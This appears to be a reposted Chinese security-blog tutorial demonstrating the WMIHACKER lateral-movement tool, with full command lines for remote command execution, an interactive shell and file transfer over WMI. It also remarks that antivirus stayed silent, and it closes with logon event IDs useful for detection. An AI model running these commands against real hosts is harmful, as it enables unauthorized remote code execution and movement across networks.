新秀安全工具

横向移动工具WMIHACKER

WMIHACKER是一款用于远程主机连接工具,通过135端口进行命令执行,执行结果读取以及无需445端口进行文件传输。

具体的介绍自己去看360的介绍吧,下面演示一下它的基本用法。

测试环境:

攻击机:win2008

受害者:win2008 + 360全家桶

29880-5w8i1o7zu.png

使用方法:

19682-sqytdd4y88.png

执行模式包括/cmd、/shell、/upload、/download分别指执行命令、模拟shell、上传文件、下载文件

/cmd模式中GETRES取1 or 0, 1代表获取命令执行结果,0代表不获取结果,比如执行命令为”echo 1 > .pipetest”这类需要重定向或其他不需要输出的命令选择值应该为0.

测试有命令回显执行方式

C:\Users\Administrator\Desktop>cscript //nologo WMIHACKER.vbs /cmd 192.168.0.106
 administrator "abc123!" "ipconfig" 1

21501-dfimq83zaf.png

全程360无反应。

除此之外还有下面的利用方法:

cscript wmihacke.vbs /cmd 192.168.0.106 administrator "abc123!" "echo whoami > c:1.txt"

获得一个交互式shell

C:\Users\Administrator\Desktop>cscript //nologo WMIHACKER.vbs /shell 192.168.0.1
06 administrator "abc123!"

39170-wf79v8rn8vd.png

当然其还有上传、下载文件的功能。

使用该工具时会在目标系统上产生4634、4624、4672、4776的登录日志

45259-asj5lv0txu4.png

且会泄漏源地址:

91316-ea1w93p6f77.png

使用该进程进行通信:
64495-90pikrhv37b.png

溯源时可注重注意该进程、事件活动。总的来说该工具是十分优秀的一款横向工具,且代码写的很优美,方便二开,具体细节有兴趣的可以进行分析。

来源:鸿鹄实验室

本文来自投稿,不代表本站立场,如若转载,请注明出处:http://www.csxxaq.com/sectools/1360.html
BadUSB简单免杀一秒上线CobaltStrike
« 上一篇 07-03
两行代码 Linux安装Metasploit,非常简单
下一篇 » 07-03

相关推荐

CS4.1真的有后门吗?

文章来源:酒仙桥六号部队前言CS是什么?可能是某款历史久远的第一人称射击游戏,也可能是某个电影。由于法律原因我们这里并不指出CS是什么,但网络江湖上一直流...